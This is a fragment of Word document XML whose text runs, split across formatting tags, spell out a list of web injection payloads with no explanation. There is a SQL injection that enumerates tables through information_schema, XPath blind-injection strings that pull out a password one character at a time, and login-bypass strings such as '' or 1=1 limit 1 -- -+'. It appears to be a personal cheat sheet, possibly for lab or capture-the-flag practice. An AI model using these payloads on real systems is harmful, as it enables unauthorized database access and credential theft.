      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008643B3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>table_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008643B3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>schema,table</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008643B3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008643B3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> FROM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008643B3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>information_Schema.tables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008643B3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538C121C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admin' and substring(password/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008643B3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>text(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008643B3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>),1,1)='7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9F91F7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 and substring(password/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008643B3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>text(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008643B3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>),1,1)='7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AF89BE" w14:textId="77777777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 xml:space="preserve">' </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008643B3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008643B3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1=1 limit 1 -- -+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54AC8E23" w14:textId="54443622" w:rsidR="008643B3" w:rsidRPr="008643B3" w:rsidRDefault="008643B3" w:rsidP="008643B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008643B3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>'="or'</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="008643B3" w:rsidRPr="00864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B3"/>
    <w:rsid w:val="008643B3"/>
    <w:rsid w:val="00F7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89F7"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{80EE620C-5EBA-4687-9450-69B30E1D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1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-09-26T06:59:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-09-26T07:07:00Z</dcterms:modified>
</cp:coreProperties>
</file>